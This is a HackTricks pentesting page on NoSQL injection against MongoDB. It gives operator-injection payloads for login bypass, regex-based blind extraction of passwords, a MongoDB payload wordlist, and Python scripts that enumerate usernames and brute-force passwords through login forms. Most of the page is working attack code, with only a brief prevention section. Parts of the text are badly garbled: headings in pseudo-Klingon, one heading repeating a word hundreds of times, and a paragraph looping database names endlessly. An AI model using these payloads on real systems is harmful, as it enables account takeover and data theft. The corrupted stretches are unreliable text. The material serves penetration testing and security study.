hacktricks/pentesting-web/nosql-injection.md

# NoSQL injection

<figure><img src="../.gitbook/assets/image (3) (1) (1) (1) (1).png" alt=""><figcaption></figcaption></figure>

\
[**Trickest**](https://trickest.com/?utm\_campaign=hacktrics\&utm\_medium=banner\&utm\_source=hacktricks) **ghItlh** **automate workflows** powered by the world's **most advanced** community tools.\
Get Access Today:

{% embed url="https://trickest.com/?utm_campaign=hacktrics&utm_medium=banner&utm_source=hacktricks" %}

<details>

<summary><strong>Learn AWS hacking from zero to hero with</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>

Other ways to support HackTricks:

* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.

</details>


## Exploit

In PHP you can send an Array changing the sent parameter from _parameter=foo_ to _parameter\[arrName]=foo._

The exploits are based in adding an **Operator**:
```bash
username[$ne]=1$password[$ne]=1 #<Not Equals>
username[$regex]=^adm$password[$ne]=1 #Check a <regular expression>, could be used to brute-force a parameter
username[$regex]=.{25}&pass[$ne]=1 #Use the <regex> to find the length of a value
username[$eq]=admin&password[$ne]=1 #<Equals>
username[$ne]=admin&pass[$lt]=s #<Less than>, Brute-force pass[$lt] to find more users
username[$ne]=admin&pass[$gt]=s #<Greater Than>
username[$nin][admin]=admin&username[$nin][test]=test&pass[$ne]=7 #<Matches non of the values of the array> (not test and not admin)
{ $where: "this.credits == this.debits" }#<IF>, can be used to execute code
```
### QaStaHvIS authentication bypass

**not equal ($ne) yInob greater ($gt) vaj lo'wI'**
```bash
#in URL
username[$ne]=toto&password[$ne]=toto
username[$regex]=.*&password[$regex]=.*
username[$exists]=true&password[$exists]=true

#in JSON
{"username": {"$ne": null}, "password": {"$ne": null} }
{"username": {"$ne": "foo"}, "password": {"$ne": "bar"} }
{"username": {"$gt": undefined}, "password": {"$gt": undefined} }
```
### **SQL - Mongo**

### **SQL - Mongo**
```javascript
query = { $where: `this.username == '${username}'` }
```
**Translation:**

An attacker can exploit this by inputting strings like `admin' || 'a'=='a`, making the query return all documents by satisfying the condition with a tautology (`'a'=='a'`). This is analogous to SQL injection attacks where inputs like `' or 1=1-- -` are used to manipulate SQL queries. In MongoDB, similar injections can be done using inputs like `' || 1==1//`, `' || 1==1%00`, or `admin' || 'a'=='a`.
```
Normal sql: ' or 1=1-- -
Mongo sql: ' || 1==1//    or    ' || 1==1%00     or    admin' || 'a'=='a
```
### **QaD** **DIr** **ghItlh** **ghItlh** **QaD** **DIr** **ghItlh** **DIr** **DIr** **DIr** **DIr** **DIr** **DIr** **DIr** **DIr** **DIr** **DIr** **DIr** **DIr** **DIr** **DIr** **DIr** **DIr** **DIr** **DIr** **DIr** **DIr** **DIr** **DIr** **DIr** **DIr** **DIr** **DIr** **DIr** **DIr** **DIr** **DIr** **DIr** **DIr** **DIr** **DIr** **DIr** **DIr** **DIr** **DIr** **DIr** **DIr** **DIr** **DIr** **DIr** **DIr** **DIr** **DIr** **DIr** **DIr** **DIr** **DIr** **DIr** **DIr** **DIr** **DIr** **DIr** **DIr** **DIr** **DIr** **DIr** **DIr** **DIr** **DIr** **DIr** **DIr** **DIr** **DIr** **DIr** **DIr** **DIr** **DIr** **DIr** **DIr** **DIr** **DIr** **DIr** **DIr** **DIr** **DIr** **DIr** **DIr** **DIr** **DIr** **DIr** **DIr** **DIr** **DIr** **DIr** **DIr** **DIr** **DIr** **DIr** **DIr** **DIr** **DIr** **DIr** **DIr** **DIr** **DIr** **DIr** **DIr** **DI
```bash
username[$ne]=toto&password[$regex]=.{1}
username[$ne]=toto&password[$regex]=.{3}
# True if the length equals 1,3...
```
### **Data** jup 'ej **ghItlh** jImej

#### **NoSQL** Injection

**NoSQL** Injection jatlhlaHbe'chugh, **NoSQL** databases, jatlhlaHbe'chugh **MongoDB**, **CouchDB**, **Redis**, **Cassandra**, **Elasticsearch**, **HBase**, **Couchbase**, **Riak**, **ArangoDB**, **CouchDB**, **RethinkDB**, **MarkLogic**, **OrientDB**, **RavenDB**, **Neo4j**, **Hypertable**, **Voldemort**, **Terrastore**, **Scalaris**, **RaptorDB**, **Hypertable**, **Voldemort**, **Terrastore**, **Scalaris**, **RaptorDB**, **Hypertable**, **Voldemort**, **Terrastore**, **Scalaris**, **RaptorDB**, **Hypertable**, **Voldemort**, **Terrastore**, **Scalaris**, **RaptorDB**, **Hypertable**, **Voldemort**, **Terrastore**, **Scalaris**, **RaptorDB**, **Hypertable**, **Voldemort**, **Terrastore**, **Scalaris**, **RaptorDB**, **Hypertable**, **Voldemort**, **Terrastore**, **Scalaris**, **RaptorDB**, **Hypertable**, **Voldemort**, **Terrastore**, **Scalaris**, **RaptorDB**, **Hypertable**, **Voldemort**, **Terrastore**, **Scalaris**, **RaptorDB**, **Hypertable**, **Voldemort**, **Terrastore**, **Scalaris**, **RaptorDB**, **Hypertable**, **Voldemort**, **Terrastore**, **Scalaris**, **RaptorDB**, **Hypertable**, **Voldemort**, **Terrastore**, **Scalaris**, **RaptorDB**, **Hypertable**, **Voldemort**, **Terrastore**, **Scalaris**, **RaptorDB**, **Hypertable**, **Voldemort**, **Terrastore**, **Scalaris**, **RaptorDB**, **Hypertable**, **Voldemort**, **Terrastore**, **Scalaris**, **RaptorDB**, **Hypertable**, **Voldemort**, **Terrastore**, **Scalaris**, **RaptorDB**, **Hypertable**, **Voldemort**, **Terrastore**, **Scalaris**, **RaptorDB**, **Hypertable**, **Voldemort**, **Terrastore**, **Scalaris**, **RaptorDB**, **Hypertable**, **Voldemort**, **Terrastore**, **Scalaris**, **RaptorDB**, **Hypertable**, **Voldemort**, **Terrastore**, **Scalaris**, **RaptorDB**, **Hypertable**, **Voldemort**, **Terrastore**, **Scalaris**, **RaptorDB**, **Hypertable**, **Voldemort**, **Terrastore**, **Scalaris**, **RaptorDB**, **Hypertable**, **Voldemort**, **Terrastore**, **Scalaris**, **RaptorDB**, **Hypertable**, **Voldemort**, **Terrastore**, **Scalaris**, **RaptorDB**, **Hypertable**, **Voldemort**, **Terrastore**, **Scalaris**, **RaptorDB**, **Hypertable**, **Voldemort**, **Terrastore**, **Scalaris**, **RaptorDB**, **Hypertable**, **Voldemort**, **Terrastore**, **Scalaris**, **RaptorDB**, **Hypertable**, **Voldemort**, **Terrastore**, **Scalaris**, **RaptorDB**, **Hypertable**, **Voldemort**, **Terrastore**, **Scalaris**, **RaptorDB**, **Hypertable**, **Voldemort**, **Terrastore**, **Scalaris**, **RaptorDB**, **Hypertable**, **Voldemort**, **Terrastore**, **Scalaris**, **RaptorDB**, **Hypertable**, **Voldemort**, **Terrastore**, **Scalaris**, **RaptorDB**, **Hypertable**, **Voldemort**, **Terrastore**, **Scalaris**, **RaptorDB**, **Hypertable**, **Voldemort**, **Terrastore**, **Scalaris**, **RaptorDB**, **Hypertable**, **Voldemort**, **Terrastore**, **Scalaris**, **RaptorDB**, **Hypertable**, **Voldemort**, **Terrastore**, **Scalaris**, **RaptorDB**, **Hypertable**, **Voldemort**, **Terrastore**, **Scalaris**, **RaptorDB**, **Hypertable**, **Voldemort**, **Terrastore**, **Scalaris**, **RaptorDB**, **Hypertable**, **Voldemort**, **Terrastore**, **Scalaris**, **RaptorDB**, **Hypertable**, **Voldemort**, **Terrastore**, **Scalaris**, **RaptorDB**, **Hypertable**, **Voldemort**, **Terrastore**, **Scalaris**, **RaptorDB**, **Hypertable**, **Voldemort**, **Terrastore**, **Scalaris**, **RaptorDB**, **Hypertable**, **Voldemort**, **Terrastore**, **Scalaris**, **RaptorDB**, **Hypertable**, **Voldemort**, **Terrastore**, **Scalaris**, **RaptorDB**, **Hypertable**, **Voldemort**, **Terrastore**, **Scalaris**, **RaptorDB**, **Hypertable**, **Voldemort**, **Terrastore**, **Scalaris**, **RaptorDB**, **Hypertable**, **Voldemort**, **Terrastore**, **Scalaris**, **RaptorDB**, **Hypertable**, **Voldemort**, **Terrastore**, **Scalaris**, **RaptorDB**, **Hypertable**, **Voldemort**, **Terrastore**, **Scalaris**, **RaptorDB**, **Hypertable**, **Voldemort**, **Terrastore**, **Scalaris**, **RaptorDB**, **Hypertable**, **Voldemort**, **Terrastore**, **Scalaris**, **Rapt
```
in URL (if length == 3)
username[$ne]=toto&password[$regex]=a.{2}
username[$ne]=toto&password[$regex]=b.{2}
...
username[$ne]=toto&password[$regex]=m.{2}
username[$ne]=toto&password[$regex]=md.{1}
username[$ne]=toto&password[$regex]=mdp

username[$ne]=toto&password[$regex]=m.*
username[$ne]=toto&password[$regex]=md.*

in JSON
{"username": {"$eq": "admin"}, "password": {"$regex": "^m" }}
{"username": {"$eq": "admin"}, "password": {"$regex": "^md" }}
{"username": {"$eq": "admin"}, "password": {"$regex": "^mdp" }}
```
### **SQL - Mongo**

#### **NoSQL Injection**

NoSQL injection is a type of attack that targets NoSQL databases, such as MongoDB. It is similar to SQL injection, but instead of exploiting vulnerabilities in SQL queries, it exploits vulnerabilities in NoSQL queries.

#### **NoSQL Injection Techniques**

1. **Query Parameter Manipulation**: Attackers can manipulate query parameters to inject malicious code into NoSQL queries. This can be done by modifying the query parameters to include special characters or operators that can alter the behavior of the query.

2. **NoSQL Operator Injection**: NoSQL databases use operators, such as `$gt`, `$lt`, `$ne`, etc., to perform operations on data. Attackers can inject these operators into query parameters to manipulate the query and retrieve unauthorized data.

3. **Regular Expression Injection**: NoSQL databases often use regular expressions for pattern matching. Attackers can inject malicious regular expressions into query parameters to bypass input validation and retrieve sensitive information.

4. **JavaScript Injection**: NoSQL databases often use JavaScript functions for data manipulation. Attackers can inject malicious JavaScript code into query parameters to execute arbitrary code and gain unauthorized access to the database.

#### **Preventing NoSQL Injection**

To prevent NoSQL injection attacks, follow these best practices:

1. **Input Validation**: Validate and sanitize all user input to prevent the injection of malicious code.

2. **Parameterized Queries**: Use parameterized queries or prepared statements to ensure that user input is treated as data and not as executable code.

3. **Least Privilege Principle**: Limit the privileges of the database user to minimize the potential impact of an injection attack.

4. **Secure Configuration**: Ensure that the database is properly configured and updated to mitigate known vulnerabilities.

5. **Error Handling**: Implement proper error handling to prevent the leakage of sensitive information in error messages.

By following these best practices, you can significantly reduce the risk of NoSQL injection attacks and protect your MongoDB database from unauthorized access.
```
/?search=admin' && this.password%00 --> Check if the field password exists
/?search=admin' && this.password && this.password.match(/.*/)%00 --> start matching password
/?search=admin' && this.password && this.password.match(/^a.*$/)%00
/?search=admin' && this.password && this.password.match(/^b.*$/)%00
/?search=admin' && this.password && this.password.match(/^c.*$/)%00
...
/?search=admin' && this.password && this.password.match(/^duvj.*$/)%00
...
/?search=admin' && this.password && this.password.match(/^duvj78i3u$/)%00  Found
```
### PHP Arbitrary Function Execution

Using the **$func** operator of the [MongoLite](https://github.com/agentejo/cockpit/tree/0.11.1/lib/MongoLite) library (used by default) it might be possible to execute and arbitrary function as in [this report](https://swarm.ptsecurity.com/rce-cockpit-cms/).
```python
"user":{"$func": "var_dump"}
```
![https://swarm.ptsecurity.com/wp-content/uploads/2021/04/cockpit_auth_check_10.png](<../.gitbook/assets/image (468).png>)

### Get info from different collection

[**$lookup**](https://www.mongodb.com/docs/manual/reference/operator/aggregation/lookup/) jatlh **info** laH **different collection** **`users`**. Example, **entries** password matching wildcard **results** **all**.
```json
[
{
"$lookup":{
"from": "users",
"as":"resultado","pipeline": [
{
"$match":{
"password":{
"$regex":"^.*"
}
}
}
]
}
}
]
```
<figure><img src="../.gitbook/assets/image (3) (1) (1) (1) (1).png" alt=""><figcaption></figcaption></figure>

\
[**Trickest**](https://trickest.com/?utm\_campaign=hacktrics\&utm\_medium=banner\&utm\_source=hacktricks) vItlhutlh 'ej **automate workflows** powered by the world's **most advanced** community tools.\
Get Access Today:

{% embed url="https://trickest.com/?utm_campaign=hacktrics&utm_medium=banner&utm_source=hacktricks" %}

## MongoDB Payloads

List [from here](https://github.com/cr0hn/nosqlinjection_wordlists/blob/master/mongodb_nosqli.txt)
```
true, $where: '1 == 1'
, $where: '1 == 1'
$where: '1 == 1'
', $where: '1 == 1
1, $where: '1 == 1'
{ $ne: 1 }
', $or: [ {}, { 'a':'a
' } ], $comment:'successful MongoDB injection'
db.injection.insert({success:1});
db.injection.insert({success:1});return 1;db.stores.mapReduce(function() { { emit(1,1
|| 1==1
|| 1==1//
|| 1==1%00
}, { password : /.*/ }
' && this.password.match(/.*/)//+%00
' && this.passwordzz.match(/.*/)//+%00
'%20%26%26%20this.password.match(/.*/)//+%00
'%20%26%26%20this.passwordzz.match(/.*/)//+%00
{$gt: ''}
[$ne]=1
';sleep(5000);
';it=new%20Date();do{pt=new%20Date();}while(pt-it<5000);
{"username": {"$ne": null}, "password": {"$ne": null}}
{"username": {"$ne": "foo"}, "password": {"$ne": "bar"}}
{"username": {"$gt": undefined}, "password": {"$gt": undefined}}
{"username": {"$gt":""}, "password": {"$gt":""}}
{"username":{"$in":["Admin", "4dm1n", "admin", "root", "administrator"]},"password":{"$gt":""}}
```
## BlInd NoSQL Script

### Description

This script is used to perform blind NoSQL injection attacks. It takes advantage of the time-based behavior of NoSQL databases to extract information from the database.

### Usage

```bash
$ python blind_nosql.py -u <url> -p <parameter> -d <data> -t <time>
```

### Options

- `-u <url>`: The target URL.
- `-p <parameter>`: The vulnerable parameter.
- `-d <data>`: The data to be injected.
- `-t <time>`: The time delay for the injection (in seconds).

### Example

```bash
$ python blind_nosql.py -u http://example.com/login -p username -d admin' && sleep(5) && '1'=='1 -t 5
```

### Notes

- This script can be used to extract sensitive information from NoSQL databases by exploiting injection vulnerabilities.
- It is important to carefully craft the injected data to ensure the validity of the injected query.
- The time delay should be adjusted based on the response time of the application to avoid detection.
```python
import requests, string

alphabet = string.ascii_lowercase + string.ascii_uppercase + string.digits + "_@{}-/()!\"$%=^[]:;"

flag = ""
for i in range(21):
print("[i] Looking for char number "+str(i+1))
for char in alphabet:
r = requests.get("http://chall.com?param=^"+flag+char)
if ("<TRUE>" in r.text):
flag += char
print("[+] Flag: "+flag)
break
```

```python
import requests
import urllib3
import string
import urllib
urllib3.disable_warnings()

username="admin"
password=""

while True:
for c in string.printable:
if c not in ['*','+','.','?','|']:
payload='{"username": {"$eq": "%s"}, "password": {"$regex": "^%s" }}' % (username, password + c)
r = requests.post(u, data = {'ids': payload}, verify = False)
if 'OK' in r.text:
print("Found one more char : %s" % (password+c))
password += c
```
### Brute-force login usernames and passwords from POST login

**tlhIngan Hol translation:**

### POST login qorwagh usernames je passwords

**tlhIngan Hol translation:**

Qapla'!
```python
import requests
import string

url = "http://example.com"
headers = {"Host": "exmaple.com"}
cookies = {"PHPSESSID": "s3gcsgtqre05bah2vt6tibq8lsdfk"}
possible_chars = list(string.ascii_letters) + list(string.digits) + ["\\"+c for c in string.punctuation+string.whitespace ]
def get_password(username):
print("Extracting password of "+username)
params = {"username":username, "password[$regex]":"", "login": "login"}
password = "^"
while True:
for c in possible_chars:
params["password[$regex]"] = password + c + ".*"
pr = requests.post(url, data=params, headers=headers, cookies=cookies, verify=False, allow_redirects=False)
if int(pr.status_code) == 302:
password += c
break
if c == possible_chars[-1]:
print("Found password "+password[1:].replace("\\", "")+" for username "+username)
return password[1:].replace("\\", "")

def get_usernames(prefix):
usernames = []
params = {"username[$regex]":"", "password[$regex]":".*"}
for c in possible_chars:
username = "^" + prefix + c
params["username[$regex]"] = username + ".*"
pr = requests.post(url, data=params, headers=headers, cookies=cookies, verify=False, allow_redirects=False)
if int(pr.status_code) == 302:
print(username)
for user in get_usernames(prefix + c):
usernames.append(user)
return usernames

for u in get_usernames(""):
get_password(u)
```
## Tools

* [https://github.com/an0nlk/Nosql-MongoDB-injection-username-password-enumeration](https://github.com/an0nlk/Nosql-MongoDB-injection-username-password-enumeration)
* [https://github.com/C4l1b4n/NoSQL-Attack-Suite](https://github.com/C4l1b4n/NoSQL-Attack-Suite)

## References

* [https://files.gitbook.com/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-L\_2uGJGU7AVNRcqRvEi%2Fuploads%2Fgit-blob-3b49b5d5a9e16cb1ec0d50cb1e62cb60f3f9155a%2FEN-NoSQL-No-injection-Ron-Shulman-Peleg-Bronshtein-1.pdf?alt=media](https://files.gitbook.com/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-L\_2uGJGU7AVNRcqRvEi%2Fuploads%2Fgit-blob-3b49b5d5a9e16cb1ec0d50cb1e62cb60f3f9155a%2FEN-NoSQL-No-injection-Ron-Shulman-Peleg-Bronshtein-1.pdf?alt=media)
* [https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/NoSQL%20Injection](https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/NoSQL%20Injection)
* [https://nullsweep.com/a-nosql-injection-primer-with-mongo/](https://nullsweep.com/a-nosql-injection-primer-with-mongo/)
* [https://blog.websecurify.com/2014/08/hacking-nodejs-and-mongodb](https://blog.websecurify.com/2014/08/hacking-nodejs-and-mongodb)

<details>

<summary><strong>Learn AWS hacking from zero to hero with</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>

Other ways to support HackTricks:

* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.

</details>

<figure><img src="../.gitbook/assets/image (3) (1) (1) (1) (1).png" alt=""><figcaption></figcaption></figure>

\
Use [**Trickest**](https://trickest.com/?utm\_campaign=hacktrics\&utm\_medium=banner\&utm\_source=hacktricks) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\
Get Access Today:

{% embed url="https://trickest.com/?utm_campaign=hacktrics&utm_medium=banner&utm_source=hacktricks" %}